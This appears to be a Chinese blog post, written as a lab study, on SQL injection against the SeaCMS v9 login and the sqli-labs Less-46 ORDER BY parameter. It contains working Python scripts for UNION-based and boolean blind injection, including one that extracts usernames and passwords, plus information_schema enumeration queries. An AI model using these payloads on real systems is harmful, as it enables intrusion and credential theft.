seacmsv9注入管理员账号密码+orderby+limit

news/2025/2/27 8:23:39

一、seacmsv9 SQL注入漏洞

查看源码

<?php
session_start();
require_once("include/common.php");
//前置跳转start
$cs=$_SERVER["REQUEST_URI"];
if($GLOBALS['cfg_mskin']==3 AND $GLOBALS['isMobile']==1){header("location:$cfg_mhost$cs");}
if($GLOBALS['cfg_mskin']==4 AND $GLOBALS['isMobile']==1){header("location:$cfg_mhost");}
//前置跳转end
require_once(sea_INC."/main.class.php");
if($cfg_user==0) 
{
	ShowMsg('系统已关闭会员功能!','index.php');
	exit();
}
$hashstr=md5($cfg_dbpwd.$cfg_dbname.$cfg_dbuser); //构造session安全码 
$svali = $_SESSION['sea_ckstr'];
if($dopost=='login')
{
	if($cfg_feedback_ck=='1')
	{
		$validate = empty($validate) ? '' : strtolower(trim($validate));
		if($validate=='' || $validate != $svali)
		{
			ResetVdValue();
			ShowMsg('验证码不正确!','-1');
			exit();
		}
	}
	if($userid=='')
	{
		ShowMsg('请输入用户名!','-1');
		exit();
	}
	if($pwd=='')
	{
		ShowMsg('请输入密码!','-1');
		exit();
	}
 
$userid = RemoveXSS(stripslashes($userid));
$userid = addslashes(cn_substr($userid,60));
 
 
$pwd = substr(md5($pwd),5,20);
$row1=$dsql->GetOne("select * from sea_member where state=1 and username='$userid'");
if($row1['username']==$userid AND $row1['password']==$pwd)
		{
					//验证是否激活邮箱
					require_once('data/admin/smtp.php');
					if($smtpreg=='on'){
						$sql="SELECT acode FROM sea_member where username= '$userid'"; 
						$row = $dsql->GetOne($sql);
						if($row['acode']!='y'){
							showMsg("您的账户尚未激活,请激活后登陆!","index.php",0,100000);
							exit;
						}
					}
					$_SESSION['sea_user_id'] = $row1['id'];
					$uid=$row1['id'];
					$_SESSION['sea_user_name'] = $row1['username'];
					if($row1['vipendtime']<time()){
						$_SESSION['sea_user_group'] = 2;
						$dsql->ExecuteNoneQuery("update `sea_member` set gid=2 where id=$uid");
						$_SESSION['hashstr']=$hashstr;
						$dsql->ExecuteNoneQuery("UPDATE `sea_member` set logincount=logincount+1 where id='$uid'");
						if($row1['gid'] !=2){
							ShowMsg("您购买的会员组已到期,请注意续费!<br>成功登录!","member.php",0,30000);
						}else{
							ShowMsg("成功登录,正在转向会员中心!","member.php",0,3000);
						}
					}else{
						$_SESSION['sea_user_group'] = $row1['gid'];
						$_SESSION['hashstr']=$hashstr;
						$dsql->ExecuteNoneQuery("UPDATE `sea_member` set logincount=logincount+1 where id='$uid'");
						ShowMsg("成功登录,正在转向会员中心!","member.php",0,3000);
					}
					
					
					exit();
 
		}
		else
		{
			ShowMsg("密码错误或账户已被禁用","login.php",0,3000);
			exit();
		}
}
else
{
	$tempfile = sea_ROOT."/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/login.html";
	if($GLOBALS['cfg_mskin']!=0 AND $GLOBALS['cfg_mskin']!=3 AND $GLOBALS['cfg_mskin']!=4  AND $GLOBALS['isMobile']==1)
	{$tempfile = sea_ROOT."/templets/".$GLOBALS['cfg_df_mstyle']."/".$GLOBALS['cfg_df_html']."/login.html";}
	$content=loadFile($tempfile);
	$t=$content;
	$t=$mainClassObj->parseTopAndFoot($t);
	$t=$mainClassObj->parseHistory($t);
	$t=$mainClassObj->parseSelf($t);
	$t=$mainClassObj->parseGlobal($t);
	$t=$mainClassObj->parseAreaList($t);
	$t=$mainClassObj->parseNewsAreaList($t);
	$t=$mainClassObj->parseMenuList($t,"");
	$t=$mainClassObj->parseVideoList($t,-444);
	$t=$mainClassObj->parseNewsList($t,-444);
	$t=$mainClassObj->parseTopicList($t);
	$t=replaceCurrentTypeId($t,-444);
	$t=$mainClassObj->parseIf($t);
	if($cfg_feedback_ck=='1')
	{$t=str_replace("{login:viewLogin}",viewLogin(),$t);}
	else
	{$t=str_replace("{login:viewLogin}",viewLogin2(),$t);}
	$t=str_replace("{login:main}",viewMain(),$t);
	$t=str_replace("{seacms:runinfo}",getRunTime($t1),$t);
	$t=str_replace("{seacms:member}",front_member(),$t);
	echo $t;
	exit();
}
 
function viewMain(){
	$main="<div class='leaveNavInfo'><h3><span id='adminleaveword'></span>".$GLOBALS['cfg_webname']."会员登录</h3></div>";
	return $main;
}
 
function viewLogin(){
	$mystr=
"<ul>".
"<form id=\"f_login\"   action=\"/".$GLOBALS['cfg_cmspath']."login.php\" method=\"post\">".
"<input type=\"hidden\" value=\"login\" name=\"dopost\" />".
"<li><input type=\"input\" name=\"userid\" autofocus class=\"form-control\" placeholder=\"用户名\" /></li>".
"<li><input type=\"password\" name=\"pwd\" class=\"form-control\" placeholder=\"密码\" /></li>".
"<li><img id=\"vdimgck\" src=\"./include/vdimgck.php\" alt=\"看不清?点击更换\" align=\"absmiddle\" class=\"pull-right\" style='width:70px; height:32px;' onClick=\"this.src=this.src+'?'\"/><input name=\"validate\" type=\"text\" placeholder=\"验证码\" style='width:50%;text-transform:uppercase;' class=\"form-control\" /> </li>".
"<li><input type=\"submit\" value=\"登录\" class=\"btn btn-block btn-warning\"/></li>".
"<li class=\"text-center\"><a class=\"text-muted\" href=\"./reg.php\">注册用户</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class=\"text-muted\" href=\"./member.php?mod=repsw\">找回密码</a></li>".
"</ul>";
	return $mystr;
}
 
function viewLogin2(){
	$mystr=
	"<ul>".
"<form id=\"f_login\"   action=\"/".$GLOBALS['cfg_cmspath']."login.php\" method=\"post\">".
"<input type=\"hidden\" value=\"login\" name=\"dopost\" />".
"<li><input type=\"input\" name=\"userid\" autofocus class=\"form-control\" placeholder=\"用户名\" /></li>".
"<li><input type=\"password\" name=\"pwd\" class=\"form-control\" placeholder=\"密码\" /></li>".
"<li><input type=\"submit\" value=\"登录\" class=\"btn btn-block btn-warning\"/></li>".
"<li class=\"text-center\"><a class=\"text-muted\" href=\"./reg.php\">注册用户</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class=\"text-muted\" href=\"./member.php?mod=repsw\">找回密码</a></li>".
"</form>".
"</ul>";
	return $mystr;
}

经过源码分析,使用以下语句注入

$row1=$dsql->GetOne("select * from sea_member where state=1 and username='$userid'");

直接使用用户的ID去查询的,那么我们有机会从这里下手

import requests
 
def get_database_names(url):
    # 构造 SQL 注入查询
    payload = "' UNION SELECT schema_name FROM information_schema.schemata -- -"
    data = {
        "dopost": "login",
        "userid": payload,
        "pwd": "anything"
    }
 
    try:
        response = requests.post(url, data=data)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"请求失败: {e}")
        return None
 
def extract_database_names(response_text):
 
    database_names = []
    lines = response_text.split("\n")
    for line in lines:
        if "<td>" in line:
            parts = line.split("<td>")
            for part in parts[1:]:
                name = part.split("</td>")[0].strip()
                if name not in database_names and name:
                    database_names.append(name)
    return database_names
 
if __name__ == '__main__':
    # 目标 URL
    target_url = "http://localhost:8000/login.php"
    response = get_database_names(target_url)
    print(response)
    if response:
        databases = extract_database_names(response)
        print("已获取到以下数据库名称:")
        for db in databases:
            print(db)
    else:
        print("无法获取数据库名称。")

回显报错

 <html> <body style="margin:0; padding:0"> <center><iframe width="100%" align="center" height="870" frameborder="0" scrolling="no" src="http://safe.webscan.360.cn/stopattack.html "></iframe></center> </body>

二、order by 布尔盲注

sqlilabs靶场第46关,参数sort传入id,如下

参数sort传入username,如下
 

 看源码可知,sort前面是order by,通过sort传入的字段排序

于是用sort=if(表达式,id,username)的方式注入,通过BeautifulSoup爬取表格中username下一格的
值是否等于Dumb来判断表达式的真假,并使用二分查找加快注入速度,从而实现boolen(布尔)
注入,具体代码如下

import requests
from bs4 import BeautifulSoup

def get_username(resp):
    soup = BeautifulSoup(resp,'html.parser')
    username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    return username

def inject_database_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_table_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
                information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_column_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
                information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_data_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \
                from users),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

if __name__ == '__main__':
    # inject_database_boolen()
    # inject_table_boolen()
    # inject_column_boolen()
    inject_data_boolen()

 注入结果如下:


 

三、过滤information_schema解决方案(mysql) 

information_schema是信息数据库,其中保存着关于mysql服务器所维护的所有其他数据库的信息。在information_schema中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件,也就是information_schema说一个虚拟数据库,物理上并不存在。

获取所有数据库列表

SELECT schema_name FROM information_schema.schemata;

 获取表名

SELECT table_name FROM information_schema.tables WHERE table_schema = 'database_name';

 获取字段名

SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'database_name' AND table_name = 'table_name';


http://www.niftyadmin.cn/n/5869794.html

相关文章

缓存击穿、缓存穿透、缓存雪崩

缓存击穿、缓存穿透、缓存雪崩

在高并发、高流量的分布式系统中&#xff0c;缓存作为优化性能的利器&#xff0c;能够有效减少数据库压力&#xff0c;提高响应速度。然而&#xff0c;在实际使用过程中&#xff0c;缓存的使用并不是一帆风顺的&#xff0c;开发者在设计缓存系统时常常会遇到一些难题&#xff0…
阅读更多...
SCIKIT-LEARN 决策树实现csv文档简单的推论预测

SCIKIT-LEARN 决策树实现csv文档简单的推论预测

一.学习背景 原文来自scikit-learn的学习拓展&#xff0c;根据樱花分类示例衍生而来。源文开源地址&#xff1a;scikit-learn: machine learning in Python — scikit-learn 0.16.1 documentation&#xff0c;想学机器学习和数据挖掘的可以去瞧瞧&#xff01; 二.读取csv文档 …
阅读更多...
Java高频面试之SE-23

Java高频面试之SE-23

hello啊&#xff0c;各位观众姥爷们&#xff01;&#xff01;&#xff01;本baby今天又来了&#xff01;哈哈哈哈哈嗝&#x1f436; Java 中的 Stream 是 Java 8 引入的一种全新的数据处理方式&#xff0c;它基于函数式编程思想&#xff0c;提供了一种高效、简洁且灵活的方式来…
阅读更多...
Spark内存迭代计算

Spark内存迭代计算

一、宽窄依赖 窄依赖&#xff1a;父RDD的一个分区数据全部发往子RDD的一个分区 宽依赖&#xff1a;父RDD的一个分区数据发往子RDD的多个分区&#xff0c;也称为shuffle 二、Spark是如何进行内存计算的&#xff1f;DAG的作用&#xff1f;Stage阶段划分的作用&#xff1f; &a…
阅读更多...
WSL2下,向github进行push时出现timeout的问题

WSL2下,向github进行push时出现timeout的问题

昨晚在完成15445 Project2.2后&#xff0c;笔者兴致冲冲地准备把代码提交到github上&#xff0c;谁知一连提交几次都出现 ssh:connect to host github.com port 22: Connection timed out 这个问题。我开始还以为是网络波动&#xff0c;测试了多次之后才发现应该是22端口出问题…
阅读更多...
Linux:(3)

Linux:(3)

一&#xff1a;Linux和Linux互传&#xff08;压缩包&#xff09; scp:Linux scp 命令用于 Linux 之间复制文件和目录。 scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 scp 是加密的&#xff0c;rcp 是不加密的&#xff0c;scp 是…
阅读更多...
【图形学入门笔记】线性代数的本质

【图形学入门笔记】线性代数的本质

【笔记未完待续】如果我的分享对你有帮助&#xff0c;请记得点赞关注不迷路。 视频源地址&#xff1a;https://www.youtube.com/watch?vfNk_zzaMoSs 作者&#xff1a;3Blue1Brown 此处仅做个人笔记使用。 01 - 向量究竟是什么&#xff1f; 线性代数中最基础、最根源的…
阅读更多...
Tomcat 目录结构和应用实现

Tomcat 目录结构和应用实现

Tomcat 是一款开源的、轻量级的 Web 服务器&#xff0c;它不仅能够提供 HTTP 服务&#xff0c;还能够运行 Java Servlet 和 JavaServer Pages&#xff08;JSP&#xff09;。对于许多开发者来说&#xff0c;理解 Tomcat 的目录结构以及如何在该结构中组织应用&#xff0c;往往是…
阅读更多...
最新文章

Copyright @ 2022~2023